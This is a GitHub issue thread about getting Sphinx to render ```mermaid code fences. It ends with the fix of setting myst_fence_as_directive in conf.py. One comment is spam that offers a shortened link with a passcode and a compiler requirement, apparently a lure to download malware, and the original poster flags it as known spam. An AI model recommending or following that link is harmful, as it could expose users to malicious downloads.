### ISSUE TITLE
Adding the required braces to triple-backslash-mermaid when sphinx-building gh-pages

### ISSUE THREAD

**Issue by cclauss** [mgaitan/sphinxcontrib-mermaid#150]
The triple-backslash-mermaid syntax works in a `README.md` file on GitHub (see image below).
> \`\`\`mermaid
Content
\`\`\`
___What is the most convenient and reliable way to add the required braces in the sphinx-build process___?
> \`\`\`{mermaid}
Content
\`\`\`

```mermaid
   sequenceDiagram
      participant Alice
      participant Bob
      Alice->John: Hello John, how are you?
      loop Healthcheck
          John->John: Fight against hypochondria
      end
      Note right of John: Rational thoughts <br/>prevail...
      John-->Alice: Great!
      John->Bob: How about you?
      Bob-->John: Jolly good!
```

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by cclauss** [comment]
# THE REPLY ABOVE IS KNOWN SPAM.  Do not click the link!!!

**Comment by cclauss** [comment]
Fixed by adding `myst_fence_as_directive = ["mermaid"]` to `conf.py` as discussed at
* https://stackoverflow.com/questions/67364913
